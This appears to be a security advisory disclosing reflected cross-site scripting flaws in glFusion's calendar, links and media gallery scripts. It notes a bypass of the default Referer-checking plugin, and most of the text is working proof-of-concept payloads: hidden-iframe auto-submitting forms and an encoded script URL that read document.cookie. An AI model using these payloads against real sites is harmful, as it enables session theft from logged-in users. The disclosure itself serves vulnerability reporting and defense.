High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.
glFusion has a βbad_behaviourβ plugin (installed by default) that verifies HTTP Referer, aimed to protect against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction PoC (Proof-of-Concept) codes for vulnerabilities 1.1 β 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1) .
1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in βaddress1β, βaddress2β, βcalendar_typeβ, βcityβ, βstateβ, βtitleβ, βurlβ, βzipcodeβ HTTP POST parameters passed to β/calendar/index.phpβ script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in userβs browser in context of the vulnerable website.
The PoC code below uses βalert()β JavaScript function to display userβs cookies:
<html>
<head>
<meta http-equiv=βContent-Typeβ content=βtext/html; charset=utf-8β>
</head>
<body>
<script>
var x = 0
function go2() { location.replace(ββ) }
function go() {
if(x) return
x += 1
try {
var html = β<form target=β_parentβ action=βhttp://[host]/calendar/index.phpβ method=βpostβ>β
html += β<input type=βhiddenβ name=βmodeβ value=βSubmitβ>β
html += β<input type=βhiddenβ name=βsavecalβ value=βSubmitβ>β
html += β<input type=βhiddenβ name=βaddress1β value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βcalendar_typeβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βcityβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βstateβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βtitleβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βurlβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βzipcodeβ value='" onmouseover=βjavascript:alert(document.cookie);β'>β
html += β<input type=βhiddenβ name=βaddress2β value='" onmouseover=βjavascript:alert(document.cookie);β'></form>β
window.frames[0].document.body.innerHTML = html
window.frames[0].document.forms[0].submit()
} catch(e) {
go2()
}
}
</script>
<iframe onload=βwindow.setTimeout(βgo()β, 99)β src=βabout:blankβ style=βvisibility:hiddenβ>
</iframe>
<script>
window.setTimeout(βgo2()β, 3333)
</script>
</body>
</html>
1.3 The vulnerabilities exists due to insufficient filtration of user-supplied data in βtitleβ and βurlβ HTTP POST parameters passed to β/links/index.phpβ script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The PoC code below uses βalert()β JavaScript function to display userβs cookies:
<html>
<head>
<meta http-equiv=βContent-Typeβ content=βtext/html; charset=utf-8β>
</head>
<body>
<script>
var x = 0
function go2() { location.replace(ββ) }
function go() {
if(x) return
x += 1
try {
var html = β<form target=β_parentβ action=βhttp://[host]/links/index.phpβ method=βpostβ>β
html += β<input type=βhiddenβ name=βmodeβ value=βSubmitβ>β
html += β<input type=βhiddenβ name=βtitleβ value='" onmouseover=βjavascript:alert(1);β'>β
html += β<input type=βhiddenβ name=βurlβ value='" onmouseover=βjavascript:alert(2);β'></form>β
window.frames[0].document.body.innerHTML = html
window.frames[0].document.forms[0].submit()
} catch(e) {
go2()
}
}
</script>
<iframe onload=βwindow.setTimeout(βgo()β, 99)β src=βabout:blankβ style=βvisibility:hiddenβ>
</iframe>
<script>
window.setTimeout(βgo2()β, 3333)
</script>
</body>
</html>
1.4 The vulnerability exists due to insufficient filtration of user-supplied data in URI after β/admin/plugins/mediagallery/xppubwiz.phpβ script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The PoC code below uses βalert()β JavaScript function to display userβs cookies:
http://[host]/admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealer t%28document.cookie%29;%3C/script%3E/